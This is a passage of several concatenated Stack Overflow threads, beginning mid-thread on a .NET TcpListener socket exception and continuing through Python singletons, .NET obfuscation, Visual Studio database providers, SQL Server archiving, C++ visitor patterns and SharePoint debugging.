My understanding is that AcceptTcpClient() is a blocking call, and that somehow winsock is telling the thread to stop blocking and continue execution.. but why? And what am I supposed to do? Just catch the exception and ignore it?
Well, I do think some other thread is closing the socket, but it's certainly not from my code. What I would like to know is: is this socket closed by the connecting client (on the other side of the socket) or is it closed by my server. Because as it is at this moment, whenever this exception occurs, it shuts down my listening port, effectively closing my service. If this is done from a remote location, then it's a major problem.
Alternatively, could this be simply the IIS server shutting down my application, and thus cancelling all my background threads and blocking methods?
A: This is my example solution to avoid WSAcancelblablabla: Define your thread as global; then you can use the invoke method like this:
private void closinginvoker(string dummy)
{
    if (InvokeRequired)
    {
        this.Invoke(new Action<string>(closinginvoker), new object[] { dummy });
        return;
    }
    t_listen.Abort();
    client_flag = true;
    c_idle.Close();
    listener1.Stop();
}
After you invoke it, close the thread first, then set the forever-loop flag so it blocks further waiting (if you have it), then close the TcpClient, then stop the listener.
A: This could happen on a serverSocket.Stop(), which I called whenever Dispose was called.
Here is what my exception handling for the listen thread looked like:
try
{
    //...
}
catch (SocketException socketEx)
{
    if (_disposed)
        ar.SetAsCompleted(null, false); //exception because listener stopped (disposed), ignore exception
    else
        ar.SetAsCompleted(socketEx, false);
}
Now what happened was, every so often the exception would occur before _disposed was set to true. So the solution for me was to make everything thread safe.
A: Is it possible that the serverSocket is being closed from another thread? That will cause this exception.
A: Same here! But I figured out that the ReceiveBuffer on the server side was being flooded by the clients!
(In my case a bunch of RFID scanners, which kept spamming the TagCode instead of stopping until the next TagCode arrived.)
It helped to raise the ReceiveBuffers and reconfigure the scanners...
A: More recently I saw this exception when using HttpWebRequest to PUT a large file and the Timeout period was passed.
With the following code, as long as your upload time is > 3 seconds, it will cause this error as far as I could see.
string path = "Reasonably large file.dat";
int bufferSize = 1024;
byte[] buffer = new byte[bufferSize];
System.Net.HttpWebRequest req = (HttpWebRequest)System.Net.HttpWebRequest.Create("Some URL");
req.Method = "PUT";
req.Timeout = 3000; //3 seconds, small timeout to demonstrate
long length = new System.IO.FileInfo(path).Length;
using (FileStream input = File.OpenRead(path))
{
    using (Stream output = req.GetRequestStream())
    {
        long remaining = length;
        int bytesRead = 0;
        while ((bytesRead = input.Read(buffer, 0, (int)Math.Min(remaining, (decimal)bufferSize))) > 0)
        {
            output.Write(buffer, 0, bytesRead);
            remaining -= bytesRead;
        }
        output.Close();
    }
    input.Close();
}
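A pattern that ties these observations together -- only a sketch, assuming the listener really is stopped deliberately from another thread -- is to set a flag before calling Stop() and then treat the resulting SocketException as a normal shutdown signal:

private volatile bool _stopping;
private TcpListener _listener;

public void Shutdown()
{
    _stopping = true;
    _listener.Stop();   // makes the blocked AcceptTcpClient() throw
}

private void ListenLoop()
{
    try
    {
        while (true)
        {
            TcpClient socket = _listener.AcceptTcpClient(); // blocks here
            pool.AddJob(new ConnectionHandler(socket, mappingStrategy));
        }
    }
    catch (SocketException)
    {
        if (!_stopping)
            throw;      // a real network error -- let it surface
        // otherwise: expected WSACancelBlockingCall during shutdown, swallow it
    }
}

pool, ConnectionHandler and mappingStrategy are the question's own types; everything else is standard System.Net.Sockets. If the exception fires while _stopping is still false, something outside your code (another thread, or the host recycling the app) stopped the listener.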
{ "language": "en", "url": "https://stackoverflow.com/questions/31871", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "54" }
Q: Is there a simple, elegant way to define singletons? There seem to be many ways to define singletons in Python. Is there a consensus opinion on Stack Overflow?
A: The module approach works well. If I absolutely need a singleton I prefer the metaclass approach.
class Singleton(type):
    def __init__(cls, name, bases, dict):
        super(Singleton, cls).__init__(name, bases, dict)
        cls.instance = None
    def __call__(cls, *args, **kw):
        if cls.instance is None:
            cls.instance = super(Singleton, cls).__call__(*args, **kw)
        return cls.instance
class MyClass(object):
    __metaclass__ = Singleton
A: There are also some interesting articles on the Google Testing blog, discussing why singletons are/may be bad and are an anti-pattern:
* *Singletons are Pathological Liars
*Where Have All the Singletons Gone?
*Root Cause of Singletons
A: I think that forcing a class or an instance to be a singleton is overkill. Personally, I like to define a normal instantiable class, a semi-private reference, and a simple factory function.
class NothingSpecial:
    pass
_the_one_and_only = None
def TheOneAndOnly():
    global _the_one_and_only
    if not _the_one_and_only:
        _the_one_and_only = NothingSpecial()
    return _the_one_and_only
Or if there is no issue with instantiating when the module is first imported:
class NothingSpecial:
    pass
THE_ONE_AND_ONLY = NothingSpecial()
That way you can write tests against fresh instances without side effects, and there is no need for sprinkling the module with global statements, and if needed you can derive variants in the future.
A: See this implementation from PEP318, implementing the singleton pattern with a decorator:
def singleton(cls):
    instances = {}
    def getinstance():
        if cls not in instances:
            instances[cls] = cls()
        return instances[cls]
    return getinstance
@singleton
class MyClass:
    ...
A: I don't really see the need, as a module with functions (and not a class) would serve well as a singleton. All its variables would be bound to the module, which could not be instantiated repeatedly anyway.
If you do wish to use a class, there is no way of creating private classes or private constructors in Python, so you can't protect against multiple instantiations, other than just via convention in use of your API. I would still just put methods in a module, and consider the module as the singleton.
A: The Python documentation does cover this:
class Singleton(object):
    def __new__(cls, *args, **kwds):
        it = cls.__dict__.get("__it__")
        if it is not None:
            return it
        cls.__it__ = it = object.__new__(cls)
        it.init(*args, **kwds)
        return it
    def init(self, *args, **kwds):
        pass
I would probably rewrite it to look more like this:
class Singleton(object):
    """Use to create a singleton"""
    def __new__(cls, *args, **kwds):
        """
        >>> s = Singleton()
        >>> p = Singleton()
        >>> id(s) == id(p)
        True
        """
        it_id = "__it__"
        # getattr will dip into base classes, so __dict__ must be used
        it = cls.__dict__.get(it_id, None)
        if it is not None:
            return it
        it = object.__new__(cls)
        setattr(cls, it_id, it)
        it.init(*args, **kwds)
        return it
    def init(self, *args, **kwds):
        pass
class A(Singleton):
    pass
class B(Singleton):
    pass
class C(A):
    pass
assert A() is A()
assert B() is B()
assert C() is C()
assert A() is not B()
assert C() is not B()
assert C() is not A()
It should be relatively clean to extend this:
class Bus(Singleton):
    def init(self, label=None, *args, **kwds):
        self.label = label
        self.channels = [Channel("system"), Channel("app")]
        ...
A: Here's my own implementation of singletons.
All you have to do is decorate the class; to get the singleton, you then have to use the instance method. Here's an example:
@Singleton
class Foo:
    def __init__(self):
        print 'Foo created'
f = Foo() # Error, this isn't how you get the instance of a singleton
f = Foo.instance() # Good. Being explicit is in line with the Python Zen
g = Foo.instance() # Returns already created instance
print f is g # True
And here's the code:
class Singleton:
    """
    A non-thread-safe helper class to ease implementing singletons.
    This should be used as a decorator -- not a metaclass -- to the
    class that should be a singleton.
    The decorated class can define one `__init__` function that
    takes only the `self` argument. Also, the decorated class cannot be
    inherited from. Other than that, there are no restrictions that apply
    to the decorated class.
    To get the singleton instance, use the `instance` method. Trying
    to use `__call__` will result in a `TypeError` being raised.
    """
    def __init__(self, decorated):
        self._decorated = decorated
    def instance(self):
        """
        Returns the singleton instance. Upon its first call, it creates a
        new instance of the decorated class and calls its `__init__` method.
        On all subsequent calls, the already created instance is returned.
        """
        try:
            return self._instance
        except AttributeError:
            self._instance = self._decorated()
            return self._instance
    def __call__(self):
        raise TypeError('Singletons must be accessed through `instance()`.')
    def __instancecheck__(self, inst):
        return isinstance(inst, self._decorated)
A: The Singleton Pattern implemented with Python courtesy of ActiveState.
It looks like the trick is to put the class that's supposed to only have one instance inside of another class.
A: class Singleton(object[,...]):
    staticVar1 = None
    staticVar2 = None
    def __init__(self):
        if self.__class__.staticVar1 == None:
            # create class instance variable for instantiation of class
            # assign class instance variable values to class static variables
        else:
            # assign class static variable values to class instance variables
A: OK, singleton could be good or evil, I know. This is my implementation, and I simply extend a classic approach to introduce a cache inside and produce many instances of different types, or many instances of the same type but with different arguments.
I called it Singleton_group, because it groups similar instances together and prevents an object of the same class with the same arguments from being created:
# Peppelinux's cached singleton
class Singleton_group(object):
    __instances_args_dict = {}
    def __new__(cls, *args, **kwargs):
        if not cls.__instances_args_dict.get((cls.__name__, args, str(kwargs))):
            cls.__instances_args_dict[(cls.__name__, args, str(kwargs))] = super(Singleton_group, cls).__new__(cls, *args, **kwargs)
        return cls.__instances_args_dict.get((cls.__name__, args, str(kwargs)))
# A dummy real-world usage example:
class test(Singleton_group):
    def __init__(self, salute):
        self.salute = salute
a = test('bye')
b = test('hi')
c = test('bye')
d = test('hi')
e = test('goodbye')
f = test('goodbye')
id(a)
3070148780L
id(b)
3070148908L
id(c)
3070148780L
b == d
True
b._Singleton_group__instances_args_dict
{('test', ('bye',), '{}'): <__main__.test object at 0xb6fec0ac>,
('test', ('goodbye',), '{}'): <__main__.test object at 0xb6fec32c>,
('test', ('hi',), '{}'): <__main__.test object at 0xb6fec12c>}
Every object carries the singleton cache...
This could be evil, but it works great for some :)
A: class Singleton(type):
    instances = dict()
    def __call__(cls, *args, **kwargs):
        if cls.__name__ not in Singleton.instances:
            Singleton.instances[cls.__name__] = type.__call__(cls, *args, **kwargs)
        return Singleton.instances[cls.__name__]
class Test(object):
    __metaclass__ = Singleton
inst0 = Test()
inst1 = Test()
print(id(inst1) == id(inst0))
A: As the accepted answer says, the most idiomatic way is to just use a module.
With that in mind, here's a proof of concept:
def singleton(cls):
    obj = cls()
    # Always return the same object
    cls.__new__ = staticmethod(lambda cls: obj)
    # Disable __init__
    try:
        del cls.__init__
    except AttributeError:
        pass
    return cls
See the Python data model for more details on __new__.
Example:
@singleton
class Duck(object):
    pass
if Duck() is Duck():
    print "It works!"
else:
    print "It doesn't work!"
Notes:
* *You have to use new-style classes (derive from object) for this.
*The singleton is initialized when it is defined, rather than the first time it's used.
*This is just a toy example. I've never actually used this in production code, and don't plan to.
A: I'm very unsure about this, but my project uses 'convention singletons' (not enforced singletons), that is, if I have a class called DataController, I define this in the same module:
_data_controller = None
def GetDataController():
    global _data_controller
    if _data_controller is None:
        _data_controller = DataController()
    return _data_controller
It is not elegant, since it's a full six lines. But all my singletons use this pattern, and it's at least very explicit (which is Pythonic).
A: You can override the __new__ method like this:
class Singleton(object):
    _instance = None
    def __new__(cls, *args, **kwargs):
        if not cls._instance:
            cls._instance = super(Singleton, cls).__new__(
                cls, *args, **kwargs)
        return cls._instance
if __name__ == '__main__':
    s1 = Singleton()
    s2 = Singleton()
    if (id(s1) == id(s2)):
        print "Same"
    else:
        print "Different"
A: Being relatively new to Python I'm not sure what the most common idiom is, but the simplest thing I can think of is just using a module instead of a class. What would have been instance methods on your class become just functions in the module, and any data just becomes variables in the module instead of members of the class. I suspect this is the Pythonic approach to solving the type of problem that people use singletons for.
If you really want a singleton class, there's a reasonable implementation described on the first hit on Google for "Python singleton", specifically:
class Singleton:
    __single = None
    def __init__( self ):
        if Singleton.__single:
            raise Singleton.__single
        Singleton.__single = self
That seems to do the trick.
A: My simple solution, which is based on the default value of function parameters:
def getSystemContext(contextObjList=[]):
    if len( contextObjList ) == 0:
        contextObjList.append( Context() )
        pass
    return contextObjList[0]
class Context(object):
    # Anything you want here
A: Singleton's half brother
I completely agree with staale, and I leave here a sample of creating a singleton half brother:
class void: pass
a = void();
a.__class__ = Singleton
a will now report as being of the same class as Singleton even though it does not look like it. So singletons using complicated classes end up depending on us not messing with them too much.
Being so, we can have the same effect and use simpler things like a variable or a module.
Still, we may want to use classes for clarity, and in Python a class is an object, so we already have the object (not an instance, but it will do just the same).
class Singleton:
    def __new__(cls): raise AssertionError # Singletons can't have instances
There we have a nice assertion error if we try to create an instance, and we can store static members on derived classes and change them at runtime (I love Python). This object is as good as the other half brothers (you can still create them if you wish), but it will tend to run faster due to its simplicity.
A: The one time I wrote a singleton in Python I used a class where all the member functions had the classmethod decorator.
class Foo:
    x = 1
    @classmethod
    def increment(cls, y=1):
        cls.x += y
A: Creating a singleton decorator (aka an annotation) is an elegant way if you want to decorate (annotate) classes going forward. Then you just put @singleton before your class definition.
def singleton(cls):
    instances = {}
    def getinstance():
        if cls not in instances:
            instances[cls] = cls()
        return instances[cls]
    return getinstance
@singleton
class MyClass:
    ...
A: A slightly different approach to implement the singleton in Python is the borg pattern by Alex Martelli (Google employee and Python genius).
class Borg:
    __shared_state = {}
    def __init__(self):
        self.__dict__ = self.__shared_state
So instead of forcing all instances to have the same identity, they share state.
A: In cases where you don't want the metaclass-based solution above, and you don't like the simple function decorator-based approach (e.g. because in that case static methods on the singleton class won't work), this compromise works:
class singleton(object):
    """Singleton decorator."""
    def __init__(self, cls):
        self.__dict__['cls'] = cls
    instances = {}
    def __call__(self):
        if self.cls not in self.instances:
            self.instances[self.cls] = self.cls()
        return self.instances[self.cls]
    def __getattr__(self, attr):
        return getattr(self.__dict__['cls'], attr)
    def __setattr__(self, attr, value):
        return setattr(self.__dict__['cls'], attr, value)
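Since several answers recommend "just use a module" without actually showing it, here is a minimal sketch of that approach (the file and attribute names are invented for illustration):

# config.py -- the module object itself is the singleton
hostname = "localhost"
port = 5432

def describe():
    return "%s:%d" % (hostname, port)

# elsewhere in the program:
import config
config.port = 6543           # every importer sees the same module object
print config.describe()      # prints "localhost:6543"

Python caches modules in sys.modules, so every import statement returns the same object -- which is exactly the singleton guarantee, with no boilerplate at all.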
{ "language": "en", "url": "https://stackoverflow.com/questions/31875", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "520" }
Q: (Why) should I use obfuscation? It seems to me obfuscation is an idea that falls somewhere in the "security by obscurity" or "false sense of protection" camp. To protect intellectual property, there's copyright; to prevent security issues from being found, there's fixing those issues. In short, I regard it as a technical solution to a social problem. Those almost never work.
However, I seem to be the only one in our dev team to feel that way, so I'm either wrong, or just need convincing arguments. Our product uses .NET, and one dev suggested .NET Reactor (which, incidentally, was suggested in this SO thread as well).
.NET Reactor completely stops any decompiling by mixing any pure .NET assembly (written in C#, VB.NET, Delphi.NET, J#, MSIL...) with native machine code.
So, basically, you throw all advantages of bytecode away in one go?
Are there good engineering benefits to obfuscation?
A: If a big team of programmers really wanted to get at your source code and had the time, money and effort, then they would be successful.
Obfuscation, therefore, should stop people who don't have the time, money or effort to get at your source, passers-by you might call them.
A: If you stick to pure managed code obfuscation, you can shave quite a bit off an assembly's size, and obfuscated class/function names (collapsed to single letters) mean a smaller memory footprint. This is almost always negligible, but does have an impact (and is used) on some mobile/embedded devices (though mostly in Java).
A: One potential engineering benefit is that in some cases obfuscation can create smaller executables or other artifacts -- e.g. obfuscating JavaScript results in smaller files (because all of the variables are named "a" and "b" instead of "descriptiveNameOne" and all the whitespace is stripped, etc). This results in faster load times for the web pages that use obfuscated JavaScript. Obviously this doesn't apply (as much) in the .NET world, but it's an example of a situation in which there is a direct engineering benefit.
A: While not related to .NET, I would consider obfuscation in JavaScript, and possibly other interpreted languages. JavaScript benefits from obfuscation because it reduces the bandwidth needed and the number of tokens the parser has to read.
But obfuscating compiled bytecode doesn't really seem that useful to me. I mean what would you try and achieve? I can only see obfuscation being slightly useful in license-checking code to avoid it being circumvented too easily.
A: The main reason to use obfuscation is to protect intellectual property as you have indicated. It is generally much more cost-effective for a business to purchase an obfuscation product like .NET Reactor than it is to try and legally enforce your copyrights.
Obfuscation can also provide other more incidental benefits such as performance improvements and assembly size reduction. These would be the engineering benefits you are looking for.
A: I posted a question which might help you as it discusses some of the issues: should-i-be-worried-about-obfuscating-my-net-code
A: You asked for engineering reasons, so this is not strictly speaking an answer to the question. But I think it's a valid clarification.
As you say, obfuscation is intended to address a social problem. And social (or business) problems, unlike technical ones, rarely have a complete solution. There are only degrees of success in addressing or minimising the problem.
In this case, obfuscation will raise the barriers to someone decompiling and stealing your code.
It will discourage casual attacks and, through inertia, may make your intellectual property less likely to be stolen. To make a tiresome analogy, an immobiliser doesn't prevent your car being stolen, but it will make it less likely.
Of course there is a cost: in maintainability, (possibly) in performance, and most importantly in making it harder for users to accurately submit bug reports.
As GateKiller said, obfuscation won't prevent a determined team from decompiling, but (and it depends what your product is) how determined a team is likely to be attacking you?
So, this is not a technical solution to a social problem; it's a technical decision which adds one influence to a complex social structure.
A: Use encryption to protect information in transit. Use obfuscation to protect information while your program still has it.
{ "language": "en", "url": "https://stackoverflow.com/questions/31882", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "8" }
Q: Does Visual Studio Server Explorer support custom database providers? I had used Server Explorer and related tools for graphical database development with Microsoft SQL Server in some of my learning projects - and it was a great experience. However, in my work I deal with Oracle DB and SQLite and my hobby projects use MySQL (because they are hosted on Linux).
Is there a way to leverage the database-related tools in Visual Studio with other database providers?
A: Here are instructions on how to connect to your MySQL database from Visual Studio:
To make the connection in Server Explorer you need to do the following:
* *first of all you need to install the MyODBC connector 3.51 (or latest) on the development machine (NB. you can find this at http://www.mysql.com/products/connector/odbc/ )
*Create a data source in Control Panel/Administrative Tools with a connection to your database. This data source is going to be used purely for Server Explorer, and you don't need to worry about creating the same data source on your client's PC when you have made your VS.NET application (unless you want to) - I don't want to cover this in this answer; it would be too long. For the purpose of this explanation I will pretend that you created a MyODBC data source called 'AADSN' to database 'noddy' on MySQL server 'SERVER01' and have a root password of 'fred'. The server can be either the Computer Name (found in Control Panel/System/Computer Name), or alternatively it can be the IP Address. NB. Make sure that you test this connection before continuing with this explanation.
*open your VS.NET project
*go to Server Explorer
*right-click on 'Data Connections'
*select 'Add Connection'
*In Data Link Properties, go to the Provider tab and select "Microsoft OLE DB Provider For ODBC drivers"
*Click Next
*If you previously created an ODBC data source then you could just select that. The disadvantage of this is that when you install your project application on the client machine, the same data source needs to be there. I prefer to use a connection string. This should look something like:
DSN=AADSN;DESC=MySQL ODBC 3.51 Driver DSN;DATABASE=noddy;SERVER=SERVER01;UID=root;PASSWORD=fred;PORT=3306;SOCKET=;OPTION=11;STMT=;
If you omit the password from the connection string then you must make sure that the data source you created (AADSN) contains a password. I am not going to describe what these mean; you can look in the MyODBC documentation for that. Just ensure that you get a "Connection Succeeded" message when you test the data source.
A: I found this during my research on SQLite. I haven't had the chance to use it though. Let us know if this works for you.
http://sqlite.phxsoftware.com/ System.Data.SQLite
System.Data.SQLite is the original SQLite database engine and a complete ADO.NET 2.0 provider all rolled into a single mixed mode assembly.
...
Visual Studio 2005/2008 Design-Time Support
You can add a SQLite connection to the Server Explorer, create queries with the query designer, drag-and-drop tables onto a Typed DataSet and more!
SQLite's designer works on full editions of Visual Studio 2005/2008, including VS2005 Express Editions.
NEW You can create/edit views, tables, indexes, foreign keys, constraints and triggers interactively within the Visual Studio Server Explorer!
A: The Server Explorer should support any database system that provides an ODBC driver. In the case of Oracle there is a built-in driver with Visual Studio.
In the Add Connection dialog, click the Change button next to the data source; you should then get a list of the providers you have drivers for.
A: Oracle has a set of tools that integrates with Visual Studio. It's packaged with their data access libraries.
http://www.oracle.com/technology/software/tech/windows/odpnet/index.html
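As a side note, the same MyODBC setup that Server Explorer uses can be reused from code; a small hedged sketch (server, database and credentials are the example values from the answer above, and the table name is a placeholder):

using System.Data.Odbc;

using (OdbcConnection conn = new OdbcConnection(
    "DRIVER={MySQL ODBC 3.51 Driver};SERVER=SERVER01;DATABASE=noddy;UID=root;PASSWORD=fred;OPTION=3;"))
{
    conn.Open();
    using (OdbcCommand cmd = new OdbcCommand("SELECT COUNT(*) FROM sometable", conn))
    {
        int rows = Convert.ToInt32(cmd.ExecuteScalar());
    }
}

The DSN-less DRIVER= form avoids having to recreate the AADSN data source on every client machine, which is the deployment concern the answer raises.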
{ "language": "en", "url": "https://stackoverflow.com/questions/31885", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "13" }
Q: How to efficiently archive older parts of a big (multi-GB) SQL Server database? Right now I am working on a solution to archive older data from a big working database to a separate archive database with the same schema. I move the data using SQL scripts and SQL Server Management Objects (SMO) from a .Net executable written in C#.
The archived data should still be accessible and even (occasionally) changeable, we just want it out of the way to keep the working database lean and fast.
Hurling large portions of data around and managing the relations between tables has proven to be quite a challenge.
I wonder if there is a better way to archive data with SQL Server.
Any ideas?
A: I think if you still want/need the data to be accessible, then partitioning some of your biggest or most-used tables could be an option.
A: Yep, use table and index partitioning with filegroups.
You don't even have to change the select statements; only do so if you want to squeeze the last bit of speed out of the result.
Another option is workload balancing with two servers and two-way replication between them.
A: We are in a similar situation. For regulatory reasons we cannot delete data for a set period of time, but many of our tables grow very large and unwieldy and realistically much of the data that is older than a month can be removed with few day-to-day problems.
We currently programmatically prune the tables, using a custom .NET/shell combination app that uses BCP to back up files, which can be zipped and left on an out-of-the-way network share. This isn't particularly accessible, but it is more space efficient. (It is complicated by our needing to keep certain historic dates, rather than being able to truncate at a certain size or with key fields in certain ranges.)
We are looking into alternatives, but, surprisingly, there's not much in the way of best practice on this topic!
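To make the partitioning suggestion concrete, here is a minimal T-SQL sketch (table, column and filegroup names are invented; SQL Server 2005+ syntax, and note that table partitioning requires Enterprise Edition) of a date-range partition that keeps older rows on a separate filegroup:

-- Rows before 2008-01-01 go to the archive filegroup
CREATE PARTITION FUNCTION pfOrderDate (datetime)
AS RANGE RIGHT FOR VALUES ('2008-01-01');

CREATE PARTITION SCHEME psOrderDate
AS PARTITION pfOrderDate TO (FG_Archive, FG_Current);

CREATE TABLE dbo.Orders (
    OrderID   int      NOT NULL,
    OrderDate datetime NOT NULL,
    -- ... other columns ...
    CONSTRAINT PK_Orders PRIMARY KEY (OrderDate, OrderID)
) ON psOrderDate (OrderDate);

Queries keep working unchanged; SQL Server routes rows by OrderDate, and whole partitions can later be moved out almost instantly with ALTER TABLE ... SWITCH instead of row-by-row copies.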
{ "language": "en", "url": "https://stackoverflow.com/questions/31906", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "5" }
Q: A more generic visitor pattern I'm sorry if my question is so long and technical, but I think it's important enough that other people will be interested in it.
I was looking for a way to cleanly separate some software internals from their representation in C++.
I have a generic parameter class (to be later stored in a container) that can contain any kind of value with the boost::any class.
I have a base class (roughly) of this kind (of course there is more stuff):
class Parameter
{
public:
    Parameter();
    template <typename T> T GetValue() const { return any_cast<T>( _value ); }
    template <typename T> void SetValue(const T& value) { _value = value; }
    virtual string GetValueAsString() const = 0;
    virtual void SetValueFromString(const string& str) = 0;
private:
    boost::any _value;
};
There are two levels of derived classes:
The first level defines the type and the conversion to/from string (for example ParameterInt or ParameterString).
The second level defines the behaviour and the real creators (for example deriving ParameterAnyInt and ParameterLimitedInt from ParameterInt, or ParameterFilename from GenericString).
Depending on the real type I would like to add external functions or classes that operate on the specific parameter type, without adding virtual methods to the base class and without doing strange casts.
For example I would like to create the proper GUI controls depending on parameter types:
Widget* CreateWidget(const Parameter& p)
Of course I cannot determine the real Parameter type from this unless I use RTTI or implement it myself (with an enum and a switch case), but this is not the right OOP design solution, you know.
The classical solution is the Visitor design pattern http://en.wikipedia.org/wiki/Visitor_pattern
The problem with this pattern is that I have to know in advance which derived types will be implemented, so (putting together what is written in Wikipedia and my code) we'll have something like:
struct Visitor
{
    virtual void visit(ParameterLimitedInt& wheel) = 0;
    virtual void visit(ParameterAnyInt& engine) = 0;
    virtual void visit(ParameterFilename& body) = 0;
};
Is there any solution to obtain this behaviour in any other way, without needing to know in advance all the concrete types and without deriving from the original visitor?
Edit: Dr. Pizza's solution seems the closest to what I was thinking, but the problem is still the same and the method is actually relying on dynamic_cast, which I was trying to avoid as a kind of (even if weak) RTTI method.
Maybe it is better to think of a solution without even citing the Visitor pattern, and clear our minds. The purpose is just having a function such as:
Widget* CreateWidget(const Parameter& p)
behave differently for each "concrete" parameter without losing info on its type
A: For a generic implementation of Visitor, I'd suggest the Loki Visitor, part of the Loki library.
A: I've used this ("acyclic visitor") to good effect; it makes adding new classes to the hierarchy possible without changing existing ones, to some extent.
A: If I understand this correctly...
We had an object that could use different hardware options. To facilitate this we used an abstract interface, Device. Device had a bunch of functions that would be fired on certain events. The use would be the same, but the various implementations of Device would either have fully fleshed-out functions or just return immediately. To make life even easier, the functions were void and threw exceptions when something went wrong.
A: For completeness's sake: it's of course completely possible to write your own implementation of a multimethod pointer table for your objects and calculate the method addresses manually at run time. There's a paper by Stroustrup on the topic of implementing multimethods (albeit in the compiler). I wouldn't really advise anyone to do this. Getting the implementation to perform well is quite complicated, and the syntax for using it will probably be very awkward and error-prone. If everything else fails, this might still be the way to go, though.

A: I am having trouble understanding your requirements. But I'll state - in my own words as it were - what I understand the situation to be:

* You have an abstract Parameter class, which is subclassed eventually to some concrete classes (eg: ParameterLimitedInt).
* You have a separate GUI system which will be passed these parameters in a generic fashion, but the catch is that it needs to present the GUI component specific to the concrete type of the parameter class.
* The restrictions are that you don't want to use RTTI, and don't want to write code to handle every possible type of concrete parameter.
* You are open to using the visitor pattern.

With those being your requirements, here is how I would handle such a situation: I would implement the visitor pattern where accept() returns a boolean value. The base Parameter class would implement a virtual accept() function and return false. Concrete implementations of the Parameter class would then contain accept() functions which call the visitor's visit(). They would return true. The visitor class would make use of a templated visit() function, so you would only override it for the concrete Parameter types you care to support:

class Visitor
{
public:
    template< class T >
    void visit( const T& param ) const
    {
        assert( false && "this parameter type not specialised in the visitor" );
    }

    void visit( const ParameterLimitedInt& ) const; // specialised implementations...
};

Thus if accept() returns false, you know the concrete type for the Parameter has not implemented the visitor pattern yet (in case there is additional logic you would prefer to handle on a case-by-case basis). If the assert() in the visitor triggers, it's because it is visiting a Parameter type for which you haven't implemented a specialisation. One downside to all of this is that unsupported visits are only caught at runtime.
{ "language": "en", "url": "https://stackoverflow.com/questions/31913", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "9" }
Q: How to make the process of debugging ASP.NET SharePoint applications less time consuming? I'm comparing it to Java, where you can start your application server in debug mode, then attach your IDE to the server. And you can change your code "on the fly" without restarting the server. As long as your changes don't affect any method signatures or fields, you can just hit recompile for a class and the application server (servlet container) will reload the class. I suppose this is impossible in ASP.NET, since all classes are packed into assemblies and you cannot unload/reload assemblies, can you? So when you have an .aspx page and an assembly deployed to the GAC and your codebehind changes, you have to redeploy the assembly and reset IIS. I'm talking about SharePoint applications in particular, and I'm not sure whether you have to do iisreset for private assemblies, but I guess you have to. So the best way to debug aspx pages with codebehind, I guess, would be to get rid of the codebehind for the time of active debugging and move it into the page, then when it is more or less working move it back to codebehind. (This would be applicable only for application pages in SharePoint; site pages don't allow inline code.) How do you approach debugging of your ASP.NET applications to make it less time consuming?

A: From Matt Smith's blog on how to get F5 debugging with SharePoint. A very cool trick.

* Create a web application project in Visual Studio (File -> New -> Project -> ASP.Net Web Application, not File -> New -> Web Site).
* Move the .csproj and .csproj.user files, along with the Properties folder, into C:\inetpub\wwwroot\wss\virtualdirectories\<port>, where <port> is the name or number of the web application corresponding to the SharePoint site you'd like to debug on.
* Attach the project to an existing solution (e.g. STSDEV project).
* Set as startup project (right-click project name, "Set as Startup Project").
* Access project properties (right-click project name, "Properties") and click the "Web" tab.
* Under the "Servers" setting, click "Use IIS web server", then enter the URL to the SharePoint web application you want to debug on, e.g. http://mymachine:99.

A: Yes, private assemblies DO NOT require a reset of IIS. So you should just xcopy the new version to the application's Bin directory and refresh the page (e.g. by a VS post-build event, as I did). But there are some trade-offs. You should decrease the trust level in the application's web.config file:

<system.web>
    ...
    <trust level="WSS_Medium" originUrl="" />
    ...
</system.web>

By the way, I do not suggest deploying like this. It's just a workaround to shorten the write-test-debug cycle.

A: If you are using the GAC, you can at least do iisapp.vbs /a "App Pool Name" /r instead of iisreset (it's quicker to recycle a single app pool than to restart IIS).

A: First, develop on a computer running SharePoint. Preferably, this means running Windows Server 2003 on Virtual PC or VMware. This will let you deploy and debug SharePoint code directly, rather than having to copy files between servers and use the remote debugger. Use a VS add-in to simplify the process of deployment and debugging. I've been using WSPBuilder but I think there are others out there. WSPBuilder has commands to deploy solutions, package them as WSPs, and attach your debugger to the local IIS process. It won't allow you to add/remove assemblies on the fly, but you can set breakpoints and run code through the Immediate window in VS. 
Depending on how your production server is configured, it's usually a good idea to develop on a server with production-like trust and security settings, including disallowing code blocks in ASPX files. This makes debugging a little more difficult, but it reduces the number of nasty surprises you'll have when your code is finally deployed to production.

A: "And you can change your code 'on the fly' without restarting the server" - you can accomplish this with ASP.NET if you make a Web Site project (as opposed to a Web Application Project). Using a Web Site project, you can post changes to code-behinds without having to refresh anything on the server, and the server does the compile work for you on all code changes. See here for more info on this. This should also solve your difficulties with deploying the assembly to the GAC. As the server handles all compilations for Web Site projects, you won't have to redeploy any assemblies when changing files.

A: Use an automated testing framework (NUnit) to write integration tests. This won't work for everything, but of course it depends on what you're testing. If you also have TestDriven.NET installed, you can run individual tests with the debugger. This has been helpful.

A: WSPBuilder Extensions has a "deploy to GAC" shortcut; unfortunately it never works for me. But it's a really quick way to code->compile->test. If you're not using WSPBuilder Extensions, you can instead open a command prompt and run:

gacutil /u yourassemblynamegoeshere
gacutil /i yourdllgoeshere.dll

If you do this often, you can put it in a post-build event or in a batch file. Also, I'm unclear whether the gacutil /u (to remove the DLL first) is necessary.

A: What it seems like you're trying to do is tell SharePoint "When I start debugging in Visual Studio, use the version of the DLL that was compiled in the project's /bin/debug directory instead of the version of the DLL that is registered in the GAC." I haven't solved that problem, but here is how I debug SharePoint. A developer machine is Win2008, IIS 7, MOSS 2007, VisStudio 2008, and WSPBuilder installed. Inside VS2008, a button is added to attach to the w3wp.exe process (see Andrew's HOWTO on attaching to w3wp). The solution file has two projects:

* The first project is the .WSP that deploys all the app pages, including the DLL. Use the WSPBuilder menu items for handling the .WSP creation and deployment.
* The second project is for the DLL behind the pages.

If you want the DLL to be copied to the GAC regularly, add a post-build event to the DLL's project that copies from /bin/Debug to the GAC. But these days I find I have just been recompiling the solution, then deploying the .WSP using the menu items, and then starting up the debugger using the button. It takes me an F-key and 3 clicks and about a minute for most of my projects, but I suppose it could be quicker.
{ "language": "en", "url": "https://stackoverflow.com/questions/31919", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
